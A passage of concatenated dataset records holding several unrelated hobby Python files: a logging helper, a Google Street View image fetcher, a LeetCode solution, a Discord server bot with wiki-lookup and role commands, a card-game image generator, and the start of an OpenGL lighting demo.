level=config.debug_level, format='%(asctime)s %(levelname)s: %(message)s', datefmt='%I:%M:%S' )\n\nimport time\n\ntime_begin = time.time()\n\n#if __name__ == '__main__':\n# log.debug('Hello from (%s)', __file__)\n\n\n#def create_table(cur, tab_name):\n# log.debug('Create table [%s]', tab_name)\n# cur.execute('CREATE TABLE ' + tab_name + '(Id INTEGER PRIMARY KEY, Time TEXT)')\n\n#def add_column(cur, tab_name, col_name, col_type):\n# log.debug('Add column [%s] to table [%s]', col_name, tab_name)\n# cur.execute('ALTER TABLE ' + tab_name + ' ADD COLUMN ' + col_name + ' ' + col_type)\n\n#def insert_into(cur, tab_name, col_name, data):\n# log.debug('Insert into table [%s], column [%s] - (%s)', tab_name, col_name, data)\n# cur.execute('INSERT INTO ' + tab_name + '(Time,' + col_name + ') ' + 'VALUES(datetime(\"now\", \"localtime\"), ' + data + ')')\n\n#def select_data(cur, tab_name, cols, rows_limit):\n# log.debug('Select %s from %s with limit: %d', cols, tab_name, rows_limit)\n# last_col = cols.split(',')[-1]\n# cur.execute('SELECT ' + cols + ' FROM ' + tab_name + ' WHERE ' + last_col + ' IS NOT Null' + ' ORDER BY ' + 'Id ' + 'DESC LIMIT ' + unicode(rows_limit))\n\n\n#log.info('(%s) execution time: [%s]\\n', __file__, time.time() - time_begin)\n\n\n\n\n\n\nif __name__ == u'__main__':\n log_tool = Log_tool(10)\n\n log_tool.info(['(%s) execution time: [%s]\\n', __file__, time.time() - time_begin])\n log_tool.debug(['Select %s from %s with limit: %s', u'cols', u'tab_name', u'rows_limit'])\n","repo_name":"kirimaks/data_plot","sub_path":"tools/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9329335636","text":"'''Get images from Google Street View'''\nfrom pathlib import Path\nimport shutil\n\nimport requests\n\n\nclass InvalidResponse(Exception):\n pass\n\n\nclass StreetView:\n ''' Get image from Google StreetView '''\n\n def __init__(self, api_key):\n self.api_key = api_key\n\n def save_image(\n self,\n image_path: Path,\n latitude: float,\n longitude: float,\n heading: int = 0,\n pitch: int = 0,\n fov: int = 120,\n width: int = 640,\n height: int = 640,\n ):\n # Construct api url\n image_size = f'{width}x{height}'\n url = f'https://maps.googleapis.com/maps/api/streetview?location={latitude},{longitude}&size={image_size}&heading={heading}&pitch={pitch}&fov={fov}&key={self.api_key}'\n\n # Get response and save\n resp = requests.get(url, stream=True)\n if resp.status_code == 200:\n with image_path.open('wb') as f:\n resp.raw.decode_content = True\n shutil.copyfileobj(resp.raw, f)\n print(f'Saved {str(image_path)}')\n else:\n raise InvalidResponse(f'{url}, statue_code: {resp.status_code}')\n","repo_name":"mknz/dsr-road-roughness-prediction","sub_path":"road_roughness_prediction/tools/google_street_view.py","file_name":"google_street_view.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"22614306830","text":"# https://leetcode.com/problems/find-smallest-letter-greater-than-target/\n\ndef next_greatest_letter(letters, target) -> str:\n for c in letters:\n if ord(c) > ord(target):\n return c\n return letters[0]\n\n\n# letters = ['a', 'b']\n# target = 'z'\n# # Output: a\n\n\n# letters = ['c', 'f', 'j']\n# target = 'a'\n# # Output: c\n\n# letters = ['c', 'f', 'j']\n# target = 'c'\n# # Output: f\n\nletters = ['c', 'f', 'j']\ntarget = 'j'\n# Output: c\n\n# letters = ['c', 'f', 'j']\n# target = 'd'\n# # Output: f\n\n\nprint(next_greatest_letter(letters, target))\n","repo_name":"abdifatahmohamad/Coding-Interview-Solutions","sub_path":"string_solutions/easy/next_greatest_target.py","file_name":"next_greatest_target.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25545379068","text":"# bot.py\nimport os, discord, asyncio, discord.utils, calendar, re, requests, datetime\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\n\nbot = commands.Bot(command_prefix='a!')\nbot.remove_command('help')\n\n@bot.event\nasync def on_ready():\n\tglobal illusoria\n\tillusoria = bot.guilds[0]\n\tprint(f\"Aimil was properly initalized at {str(datetime.datetime.now())}\")\n\n@bot.command(name='help')\nasync def help(ctx, command=''):\n print(f\"help command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n header = '''\nAll commands for Aimil begin with the prefix 'a!'. Most commands are also formatted into user-friendly strings, instead of returning primital values.\nIn the usage statements, parameters specified with {curly braces} required, while (parenthesis) are optional.\nFor any issues, please contact @Citrisfur#0404, or nathanscoy@gmail.com.\n'''\n commandList = {\n \"help\": '''\nhelp // Displays a list of commands that Aimil can recognize.\n Usage: a!help (command)\n [string] command - specifies a command to display additional information about.''',\n \"ping\": '''\nping // Returns the bot's latency in seconds.\n Usage: a!ping''',\n }\n\n if command != '':\n if command.lower() in commandList:\n await ctx.send(header + commandList[command.lower()])\n else:\n await ctx.send(\"The specified command doesn't exist. Recheck the typing, or try the command list with a!help.\")\n else:\n await ctx.send(header + '''\n=== Command List ===\n\nhelp\nping\ntech\njoined\necho\n\n== Moderator ==\n\ngiverole\nremoverole\nremoveintro\n\n= Debugging =\n\nwikitest\nlistemoji\nmodcheck\n''')\n\n@bot.command(name='ping')\nasync def ping(ctx):\n print(f\"ping command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n await ctx.send(f\"Aimil is latent by {str(bot.latency)} seconds.\")\n\n@bot.command(name=\"wikitest\", help=\"a way to test the wiki's status\")\nasync def wikitest(ctx):\n\tprint(f\"wikitest command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tpage = requests.get(\"http://ichno.org/illusoria/doku.php?id=players:citrisfur\")\n\tpageText = page.text\n\toutput = \"Testing on Citrisfur's wiki page:\\nInformation as it appears on the wiki:\\n\"\n\n\tresult = re.search(\"Join date:.+>(.+)<\", pageText)\n\toutput += \"Citrisfur's join date: \" + result.group(1) + '\\n'\n\n\tresult = re.search(\"DoB:.+>(.+)<\", pageText)\n\toutput += \"Citrisfur's DoB: \" + result.group(1) + '\\n'\n\n\tresult = re.search(\"Timezone:.+>(.+)<\", pageText)\n\toutput += \"Citrisfur's time zone: \" + result.group(1) + '\\n'\n\tawait ctx.send(output)\n\n@bot.command(name=\"tech\", help=\"retrieves a tech from the wiki\")\nasync def tech(ctx, techName):\n\tprint(f\"tech command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tawait ctx.trigger_typing()\n\tpageNum = 1\n\tpages = {\n\t\t1: \"dark\",\n\t\t2: \"earth\",\n\t\t3: \"fire\",\n\t\t4: \"light\",\n\t\t5: \"oz\",\n\t\t6: \"water\",\n\t\t7: \"wind\",\n\t\t8: \"no_element\"\n\t}\n\n\tresult = None\n\twhile result == None:\n\t\tpage = requests.get(\"http://ichno.org/illusoria/doku.php?id=lore:techniques:\" + pages[pageNum] + \"&do=edit\")\n\t\tpageText = page.text\n\t\tresult = re.search(\"^.+\" + techName + \".+\\|\", pageText, flags=re.M+re.I)\n\t\tpageNum += 1\n\t\tif pageNum == 9:\n\t\t\tbreak\n\n\tif result != None:\n\t\tawait ctx.send(\"**Tech:** \" + techName.capitalize() + ' ' + ctx.author.mention + \"\\n```fix\\n^ Stage ^ Technique ^ Range/Targets ^ Style ^ Element ^ Power ^ Other Information ^ Description ^ Evo. From ^```\\n```\" + result.group(0).replace(\""\", \"\\\"\") + \"```\")\n\telse:\n\t\tawait ctx.send(ctx.author.mention + \" Tech \" + techName + \" not found in the wiki.\")\n\n@bot.command(name=\"listemoji\", help=\"lists all server emojis\")\nasync def listemoji(ctx):\n\tprint(f\"listemoji command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\temojiList = ''\n\ti = 0\n\tfor emoji in illusoria.emojis:\n\t\temojiList += emoji.name + \": \" + str(emoji) + \", \"\n\t\ti += 1\n\t\tif i == 20:\n\t\t\tawait ctx.send(emojiList[:-2])\n\t\t\temojiList = ''\n\t\t\ti = 0\n\n\tawait ctx.send(emojiList[:-2])\n\n@bot.command(name=\"joined\")\nasync def joined(ctx, name=''):\n\tprint(f\"joined command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tif name == '':\n\t\tname = ctx.author.name\n\tmember = await illusoria.query_members(query=name, limit=1, user_ids=None, cache=True)\n\tif member != []:\n\t\tjoinTime = str(member[0].joined_at)\n\t\tawait ctx.send(member[0].name + \" joined Illusoria on \" + calendar.month_name[int(joinTime[6:7])] + \" \" + joinTime[9:10] + \", \" + joinTime[0:4] + \" at \" + joinTime[12:] + \" UTC.\")\n\telse:\n\t\tawait ctx.send(\"Member not found.\")\n\n@bot.command(name='echo')\nasync def echo(ctx, msg):\n\tprint(f\"echo command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tawait ctx.send(msg)\n\n@bot.command(name='createrole')\n@commands.has_role(\"Mod Gestapo\")\nasync def createrole(ctx, roleName, r, g, b):\n\tprint(f\"createrole command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tnewRoleID = 0\n\thighestPosition = 0\n\tawait illusoria.create_role(name=roleName, color=discord.Color.from_rgb(int(r), int(g), int(b)))\n\n\tfor role in illusoria.roles:\n\t\tif role.name == roleName:\n\t\t\tnewRoleID = role.id\n\n\tfor role in ctx.author.roles:\n\t\tif role.position > highestPosition:\n\t\t\thighestPosition = role.position\n\n\tawait illusoria.get_role(newRoleID).edit(position=highestPosition+1, reason=\"putting the role at high priority for username color change\")\n\tawait ctx.author.add_roles(illusoria.get_role(newRoleID))\n\tawait ctx.send(f\"you should now have the new role \\\"{roleName}\\\".\")\n\n@bot.command(name='kick')\nasync def kick(ctx):\n\tprint(f\"kick command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tawait illusoria.kick(ctx.author)\n\tawait ctx.send(f\"user {ctx.author} kicked.\")\n\n@bot.command(name='deleterole')\n@commands.has_role(\"Mod Gestapo\")\nasync def createrole(ctx, roleName):\n\tprint(f\"deleterole command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tconfirmCheck = True\n\n\tfor role in illusoria.roles:\n\t\tif roleName.lower() in role.name.lower():\n\t\t\tawait ctx.send(f\"role \\\"{role.name}\\\" found. delete this role? y/n\")\n\t\t\twhile confirmCheck:\n\t\t\t\tconfirm = await bot.wait_for('message')\n\t\t\t\tif confirm.author == ctx.author:\n\t\t\t\t\tconfirmCheck = False\n\n\t\t\tif confirm.content == 'y':\n\t\t\t\tawait role.delete()\n\t\t\t\tawait ctx.send(f\"role \\\"{role.name}\\\" was deleted.\")\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tawait ctx.send(\"role was not deleted.\")\n\t\t\t\tconfirmCheck = True\n\n@bot.command(name=\"giverole\")\n@commands.has_role(\"Mod Gestapo\")\nasync def giverole(ctx, addingRole, person):\n\tprint(f\"giverole command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tfor role in illusoria.roles:\n\t\tif str(addingRole) in role.name:\n\t\t\taddingRole = role\n\t\t\tbreak\n\n\tmember = await illusoria.query_members(query=person, limit=1, user_ids=None, cache=True)\n\tif member == []:\n\t\tawait ctx.send(f\"Member {person} not found.\")\n\telse:\n\t\tawait member[0].add_roles(illusoria.get_role(addingRole.id))\n\t\tawait ctx.send(f\"{member[0].name} now has the {illusoria.get_role(addingRole.id).name} role.\")\n\n@bot.command(name=\"removerole\")\n@commands.has_role(\"Mod Gestapo\")\nasync def removerole(ctx, removingRole, person):\n\tprint(f\"removerole command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tremoveRole = removingRole\n\tmember = await illusoria.query_members(query=person, limit=1, user_ids=None, cache=True)\n\tfor role in member[0].roles:\n\t\tif str(removingRole) in role.name:\n\t\t\tremoveRole = role\n\t\t\tbreak\n\n\tif removeRole == removingRole:\n\t\tawait ctx.send(member[0].name + \" does not have the role.\")\n\t\treturn\n\n\tawait member[0].remove_roles(illusoria.get_role(removeRole.id))\n\tawait ctx.send(member[0].name + \" no longer has the role \" + illusoria.get_role(removeRole.id).name + \".\")\n\n@bot.command(name=\"removeintro\")\nasync def removeintro(ctx, person):\n\tprint(f\"removeintro command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tconfirmCheck = True\n\tconfirm = ''\n\n\tasync for intro in bot.get_channel(737087582764269635).history():\n\t\tif person in intro.author.name.lower():\n\t\t\tawait ctx.send(f\"intro by {intro.author.name} found. delete this intro? y/n\")\n\t\t\twhile confirmCheck:\n\t\t\t\tconfirm = await bot.wait_for('message')\n\t\t\t\tif confirm.author == ctx.author:\n\t\t\t\t\tconfirmCheck = False\n\n\t\t\tif confirm.content == 'y':\n\t\t\t\tawait intro.delete()\n\t\t\t\tawait ctx.send(f\"intro by {intro.author.name} was deleted.\")\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tawait ctx.send(\"intro was not deleted.\")\n\t\t\t\tconfirmCheck = True\n\n\tif confirm == '':\n\t\tawait ctx.send(f\"no intros by user {person} were found.\")\n\n@bot.command(name='lastmessage')\nasync def lastmessage(ctx, name):\n\tprint(f\"removeintro command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tmember = await illusoria.query_members(query=name, limit=1, user_ids=None, cache=True)\n\tif member != []:\n\t\tfor channel in illusoria.channels:\n\t\t\ttry:\n\t\t\t\tasync for message in channel.history():\n\t\t\t\t\tawait ctx.send(f\"Message by {member.name} found\")\n\t\t\t\t\tprint(message.content)\n\t\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tpass\n\telse:\n\t\tawait ctx.send(\"Member not found.\")\n\n@bot.command(name=\"modcheck\")\n@commands.has_role(\"Mod Gestapo\")\nasync def modcheck(ctx):\n\tprint(f\"modcheck command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tawait ctx.send(\"pass\")\n\n@bot.event\nasync def on_command_error(ctx, error):\n\tusages = {\n\t\t\"joined\": \"Usage: a!joined {user-name}\",\n\t\t\"giverole\": \"Usage: a!giverole {role-name} {user-name}\",\n\t\t\"removerole\": \"Usage: a!removerole {role-name} {user-name}\",\n\t\t\"removeintro\": \"Usage: a!removeintro {user-name}\",\n\t}\n\n\tif isinstance(error, commands.errors.MissingRequiredArgument):\n\t\tawait ctx.send(usages.get(ctx.invoked_with))\n\telif isinstance(error, commands.errors.CheckFailure):\n\t\tawait ctx.send(\"You do not have the mod role.\")\n\telse:\n\t\tawait ctx.send(str(error))\n\nbot.run(TOKEN)\n","repo_name":"Citrisfur/discord-aimil","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":9961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40143317918","text":"import json\nfrom PIL import Image, ImageDraw, ImageFont\nimport os\nfrom image_utils import ImageText\n\n\nclass Card:\n def __init__(self, name, data):\n self.data = data\n\n self.file_name = f\"../cards/{name}.png\"\n\n self.font_name = 'arial.ttf'\n self.font_main_name = 'arial.ttf'\n self.font_main = ImageFont.truetype(self.font_main_name, 12)\n self.font = ImageFont.truetype(self.font_name, 10)\n self.neutralColorA = (66, 66, 66)\n\n #########################\n\n def generate_buff(self):\n self.mode = \"buff\"\n image = Image.open(r\"../../assets/c.jpg\")\n\n image = self.change_color(image)\n\n self.draw_lines(image)\n\n # image = self.draw_main_stats(image)\n\n image = self.add_image(image)\n\n text_layer = self.get_text_layer()\n image = Image.alpha_composite(image, text_layer)\n\n image = self.draw_main_stats(image)\n\n image = self.add_special_info(image)\n\n #########################\n\n image.save(self.file_name)\n # os.system(self.file_name) # show file\n\n\n def generate_equipment_and_spells(self):\n self.mode = \"equipment_and_spell\"\n image = Image.open(r\"../../assets/c.jpg\")\n\n image = self.change_color(image)\n\n self.draw_lines(image)\n\n #image = self.draw_main_stats(image)\n\n image = self.add_image_cropped(image)\n\n text_layer = self.get_text_layer()\n image = Image.alpha_composite(image, text_layer)\n\n image = self.add_special_info(image)\n\n image = self.add_text_no_box(image,f\"{self.data['description']}\",120, 230, 180, 120, maximum_font_size=12)\n\n #########################\n\n image.save(self.file_name)\n # os.system(self.file_name) # show file\n\n def generate_interrupt(self):\n self.mode = \"interrupt\"\n image = Image.open(r\"../../assets/c.jpg\")\n\n image = self.change_color(image)\n\n self.draw_lines(image)\n\n #image = self.draw_main_stats(image)\n\n image = self.add_image_cropped(image)\n\n text_layer = self.get_text_layer()\n image = Image.alpha_composite(image, text_layer)\n\n image = self.add_special_info(image)\n\n image = self.add_text_no_box(image,f\"{self.data['description']}\",120, 230, 180, 120, maximum_font_size=12)\n\n #########################\n\n image.save(self.file_name)\n # os.system(self.file_name) # show file\n\n def generate_event(self):\n self.mode = \"event\"\n image = Image.open(r\"../../assets/c.jpg\")\n\n image = self.change_color(image)\n\n self.draw_lines(image)\n\n #image = self.draw_main_stats(image)\n\n image = self.add_image_cropped(image)\n\n text_layer = self.get_text_layer()\n image = Image.alpha_composite(image, text_layer)\n\n image = self.add_special_info(image)\n\n\n image = self.add_text_no_box(image, f\"{self.data['description']}\", 120, 230, 180, 120, maximum_font_size=12)\n\n #########################\n\n image.save(self.file_name)\n # os.system(self.file_name) # show file\n\n def generate_creature(self):\n self.mode = \"creature\"\n image = Image.open(r\"../../assets/c.jpg\")\n\n image = self.change_color(image)\n\n self.draw_lines(image)\n\n image = self.draw_main_stats(image)\n\n image = self.add_image(image)\n\n text_layer = self.get_text_layer()\n image = Image.alpha_composite(image, text_layer)\n\n image = self.add_special_info(image)\n\n #########################\n\n image.save(self.file_name)\n #os.system(self.file_name) # show file\n\n def add_special_info(self, image):\n if self.mode == \"equipment_and_spell\":\n if self.data['type'] == \"spell\":\n image = self.add_text(image, f\"(Zauber)\", 120, 60, 200, 12)\n elif self.data[\"type\"] == \"equipment\":\n image = self.add_text(image, f\"(Ausrüstung)\", 120, 60, 200, 12)\n elif self.mode == \"buff\":\n image = self.add_text(image, f\"(Eigenschaft)\", 120, 60, 200, 12)\n elif self.mode == \"interrupt\":\n image = self.add_text(image, f\"(Konter)\", 120, 60, 200, 12)\n elif self.mode == \"event\":\n image = self.add_text(image, f\"(Event)\", 120, 60, 200, 12)\n else:\n if self.data[\"equipment_slot\"] == True and self.data[\"spell_slot\"] == True:\n image = self.add_text(image, f\"(Slot: Ausrüstung o. Zauber)\", 120, 60, 200, 12)\n elif self.data[\"spell_slot\"] == True:\n image = self.add_text(image, f\"(Slot: Zauber)\", 120, 60, 200, 12)\n elif self.data[\"equipment_slot\"] == True:\n image = self.add_text(image, f\"(Slot: Ausrüstung)\", 120, 60, 200, 12)\n return image\n\n def get_text_layer(self):\n img2 = ImageText((240, 336), mode=\"RGBA\", background=(0, 0, 0, 30), maximum_font_size=16)\n img2.image.convert(\"PA\")\n img2.fill_text_box((120, 20), self.data[\"name\"], box_width=180, box_height=40, font_filename=self.font_name)\n overlay = img2.image\n overlay.convert(\"RGBA\")\n return overlay\n\n def add_text(self, image, text, centerX, centerY, width, height, maximum_font_size=16):\n if text == \"\":\n return image\n img2 = ImageText((240, 336), mode=\"RGBA\", background=(0, 0, 0, 0), maximum_font_size=maximum_font_size)\n img2.image.convert(\"PA\")\n img2.fill_text_box((centerX, centerY), text, box_width=width, box_height=height, font_filename=self.font_name)\n overlay = img2.image\n overlay.convert(\"RGBA\")\n image = Image.alpha_composite(image, overlay)\n return image\n\n def add_text_no_box(self, image, text, centerX, centerY, width, height, maximum_font_size=16):\n if text == \"\":\n return image\n img2 = ImageText((240, 336), mode=\"RGBA\", background=(0, 0, 0, 0), maximum_font_size=maximum_font_size)\n img2.image.convert(\"PA\")\n img2.write_text_box((centerX, centerY), text, box_width=width, font_size=maximum_font_size, font_filename=self.font_name)\n overlay = img2.image\n overlay.convert(\"RGBA\")\n image = Image.alpha_composite(image, overlay)\n return image\n\n def add_image(self, image):\n if \"image\" in self.data and self.data[\"image\"] != \"\":\n im2 = Image.open(f'../../assets/{self.data[\"image\"]}.png')\n else:\n im2 = Image.open('../../assets/empty.png')\n\n #im2.thumbnail((232, 232), Image.Resampling.LANCZOS)\n #im2 = im2.crop((0, 49, im2.width - 1, im2.height - 49))\n\n im2.thumbnail((232, 232), Image.Resampling.LANCZOS)\n #im2 = im2.crop((0, 49, im2.width - 1, im2.height - 49))\n\n image = image.copy()\n image.paste(im2, (5, 336-232-28))\n return image\n\n def add_image_cropped(self, image):\n if \"image\" in self.data and self.data[\"image\"] != \"\":\n im2 = Image.open(f'../../assets/{self.data[\"image\"]}.png')\n else:\n im2 = Image.open('../../assets/empty.png')\n\n im2.thumbnail((232, 232), Image.Resampling.LANCZOS)\n im2 = im2.crop((0, 49, im2.width - 1, im2.height - 49))\n\n image = image.copy()\n image.paste(im2, (5, 336-232-28))\n return image\n\n def draw_lines(self, image):\n draw = ImageDraw.Draw(image, mode=\"RGBA\")\n # draw text\n\n draw.line(xy=[(0, 0), (image.width, 0), (image.width, image.height), (0, image.height), (0, 0)],\n fill=self.neutralColorA, width=10)\n #draw.line(xy=[(0, 25), (image.width, 25)], fill=self.neutralColorA, width=1)\n #draw.line(xy=[(0, 50), (image.width, 50)], fill=self.neutralColorA, width=1)\n\n\n if self.mode == \"creature\" or self.mode == \"buff\":\n draw.line(xy=[(0, 310), (image.width, 310)], fill=self.neutralColorA, width=5)\n else:\n draw.line(xy=[(0, 336-28-49-49), (image.width, 336-28-49-49)], fill=self.neutralColorA, width=2)\n\n if \"victory_points\" in self.data and self.data['victory_points'] > 0:\n draw.text((image.width - 30, 20), f\"{self.data['victory_points']} VP\", font=self.font,\n fill=self.neutralColorA)\n if \"cost_silver\" in self.data and self.data['cost_silver'] > 0:\n draw.text((10, 20), f\"{self.data['cost_silver']} S\", font=self.font, fill=self.neutralColorA)\n if \"cost_zynalith\" in self.data and self.data['cost_zynalith'] > 0:\n draw.text((10, 35), f\"{self.data['cost_zynalith']} Z\", font=self.font, fill=self.neutralColorA)\n\n draw.line(xy=[(0, 336-232-28-2), (image.width, 336-232-28-2)], fill=self.neutralColorA, width=2)\n #draw.line(xy=[(0, 185), (image.width, 185)], fill=self.neutralColorA, width=1)\n\n\n def draw_main_stats(self, image):\n draw = ImageDraw.Draw(image, mode=\"RGBA\")\n draw.line(xy=[(61, 310), (61, 336)], fill=self.neutralColorA, width=6)\n draw.line(xy=[(120, 310), (120, 336)], fill=self.neutralColorA, width=6)\n draw.line(xy=[(179, 310), (179, 336)], fill=self.neutralColorA, width=6)\n\n helligkeit = 200\n draw.rectangle([(5, 313), (58, 331)], fill=(255,255,helligkeit))\n draw.rectangle([(64, 313), (117, 331)], fill=(255, helligkeit, helligkeit))\n draw.rectangle([(123, 313), (176, 331)], fill=(helligkeit, helligkeit, 255))\n draw.rectangle([(182, 313), (235, 331)], fill=(helligkeit, 255, helligkeit))\n # total_width = 240 - 5*5 = 215, 215/4= 53,75\n\n\n image = self.add_text(image, f\"{self.data['initiative']} INIT\", 31, 323, 50, 16)\n image = self.add_text(image, f\"{self.data['attack']} ATK\", 89, 323, 50, 16)\n image = self.add_text(image, f\"{self.data['defense']} DEF\", 151, 323, 50, 16)\n image = self.add_text(image, f\"{self.data['health_points']} HP\", 209, 323, 50, 16)\n\n\n\n return image\n\n def change_color(self, image):\n image = image.convert(\"RGBA\")\n d = image.getdata()\n new_image = []\n\n creature = (0,0,0)\n spell = (2,-4,2)\n equip = (4,-2,-2) #(2,1,-2)\n interrupt = (4,4,4)\n event = (2,2,-4)\n buff = (-3,-2,4) #(-1,3,1)\n\n for idx, item in enumerate(d):\n r = item[0]\n g = item[1]\n b = item[2]\n a = item[3]\n total = r + g + b\n change = round(total / 40)\n\n tmp = idx % 240\n if self.mode == \"equipment_and_spell\":\n if self.data[\"type\"] == \"equipment\":\n new_image.append((r + equip[0] * change, g + equip[1] * change, b + equip[2] * change, a))\n else:\n new_image.append((r + spell[0] * change, g + spell[1] * change, b + spell[2] * change, a))\n elif self.mode == \"buff\":\n new_image.append((r + buff[0] * change, g + buff[1] * change, b + buff[2] * change, a))\n elif self.mode == \"interrupt\":\n new_image.append((r + interrupt[0] * change, g + interrupt[1] * change, b + interrupt[2] * change, a))\n elif self.mode == \"event\":\n new_image.append((r + event[0] * change, g + event[1] * change, b + event[2] * change, a))\n else:\n if self.data[\"equipment_slot\"] == True and self.data[\"spell_slot\"] == True:\n if tmp < 120:\n new_image.append((r + equip[0] * change, g + equip[1] * change, b + equip[2] * change, a))\n else:\n new_image.append((r + spell[0] * change, g + spell[1] * change, b + spell[2] * change, a))\n elif self.data[\"spell_slot\"] == True:\n new_image.append((r + spell[0] * change, g + spell[1] * change, b + spell[2] * change, a))\n elif self.data[\"equipment_slot\"] == True:\n new_image.append((r + equip[0] * change, g + equip[1] * change, b + equip[2] * change, a))\n else:\n new_image.append((r, g, b, a))\n image.putdata(new_image)\n return image\n\nif False:\n with open(\"../card_data/creatures\", \"r\") as f:\n content = f.read()\n content = json.loads(content)\n for idx, card_data in enumerate(content):\n card = Card(f\"creature-{idx}\", card_data)\n card.generate_creature()\n\n with open(\"../card_data/buffs\", \"r\") as f:\n content = f.read()\n content = json.loads(content)\n for idx, card_data in enumerate(content):\n card = Card(f\"buff-{idx}\", card_data)\n card.generate_buff()\n\nwith open(\"../card_data/interrupts\", \"r\") as f:\n content = f.read()\n content = json.loads(content)\n for idx, card_data in enumerate(content):\n card = Card(f\"interrupt-{idx}\", card_data)\n card.generate_interrupt()\n\nwith open(\"../card_data/equipment_and_spells\", \"r\") as f:\n content = f.read()\n content = json.loads(content)\n for idx, card_data in enumerate(content):\n card = Card(f\"equipment_and_spells-{idx}\", card_data)\n card.generate_equipment_and_spells()\n\nwith open(\"../card_data/events\", \"r\") as f:\n content = f.read()\n content = json.loads(content)\n for idx, card_data in enumerate(content):\n card = Card(f\"event-{idx}\", card_data)\n card.generate_event()","repo_name":"pharnisch/card-game","sub_path":"creature_fights/card_creation_scripts/card_creation.py","file_name":"card_creation.py","file_ext":"py","file_size_in_byte":13350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19296121713","text":"import glfw\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nimport numpy as np\nfrom OpenGL.arrays import vbo\nimport ctypes\n\ngCamAng = 0.\ngCamHeight = 1.\nobject_C = (0,0,0,1)\nlightColor = (1.,1.,1.,1.)\nR_ = 0\nG_ = 0\nB_ = 0\n \n\ndef createVertexAndIndexArrayIndexed():\n varr = np.array([\n (-1,1,1),\n (1,1,1),\n (1,-1,1),\n (-1,-1,1),\n (-1,1,-1),\n (1,1,-1),\n (1,-1,-1),\n (-1,-1,-1),\n ], 'float32')\n\n iarr = np.array([\n (0,2,1),\n (0,3,2),\n (4,5,6),\n (4,6,7),\n (0,1,5),\n (0,5,4),\n (3,6,2),\n (3,7,6),\n (1,2,6),\n (1,6,5),\n (0,7,3),\n (0,4,7),\n ])\n\n narr = np.array([\n (-0.5773502691896258, 0.5773502691896258, 0.5773502691896258),\n (0.8164965809277261, 0.4082482904638631, 0.4082482904638631),\n (0.4082482904638631, -0.4082482904638631, 0.8164965809277261),\n (-0.4082482904638631, -0.8164965809277261, 0.4082482904638631),\n (-0.4082482904638631, 0.4082482904638631, -0.8164965809277261),\n (0.4082482904638631, 0.8164965809277261, -0.4082482904638631),\n (0.5773502691896258, -0.5773502691896258, -0.5773502691896258),\n (-0.8164965809277261, -0.4082482904638631, -0.4082482904638631),\n ], 'float32')\n return varr, iarr, narr\n\n\ndef render():\n global gCamAng, gCamHeight\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n glEnable(GL_DEPTH_TEST)\n\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(45, 1, 1,10)\n\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n gluLookAt(5*np.sin(gCamAng),gCamHeight,5*np.cos(gCamAng), 0,0,0, 0,1,0)\n\n drawFrame()\n\n glEnable(GL_LIGHTING) # try to uncomment: no lighting\n glEnable(GL_LIGHT0)\n\n glEnable(GL_NORMALIZE) # try to uncomment: lighting will be incorrect if you scale the object\n glEnable(GL_RESCALE_NORMAL)\n\n # light position\n glPushMatrix()\n t = glfw.get_time()\n\n # glRotatef(t*(180/np.pi),0,1,0) # try to uncomment: rotate light\n lightPos = (3.,4.,5.,1.) # try to change 4th element to 0. or 1.\n glLightfv(GL_LIGHT0, GL_POSITION, lightPos)\n glPopMatrix()\n \n # light intensity for each color channel\n lightColor = (1.,1.,1.,1.)\n ambientLightColor = (.1,.1,.1,1.)\n glLightfv(GL_LIGHT0, GL_DIFFUSE, lightColor)\n glLightfv(GL_LIGHT0, GL_SPECULAR, lightColor)\n glLightfv(GL_LIGHT0, GL_AMBIENT, ambientLightColor)\n\n # material reflectance for each color channel\n objectColor = (R_,G_,B_,1)\n specularObjectColor = (1.,1.,1.,1.)\n glMaterialfv(GL_FRONT, GL_AMBIENT_AND_DIFFUSE, objectColor)\n glMaterialfv(GL_FRONT, GL_SHININESS, 10)\n glMaterialfv(GL_FRONT, GL_SPECULAR, specularObjectColor)\n\n glPushMatrix()\n glColor3ub(0, 0, 255) # glColor*() is ignored if lighting is enabled\n\n varr, iarr, narr = createVertexAndIndexArrayIndexed()\n glEnableClientState(GL_VERTEX_ARRAY)\n glEnableClientState(GL_NORMAL_ARRAY)\n glNormalPointer(GL_FLOAT, 3*narr.itemsize, narr)\n glVertexPointer(3, GL_FLOAT, 3*varr.itemsize, varr)\n 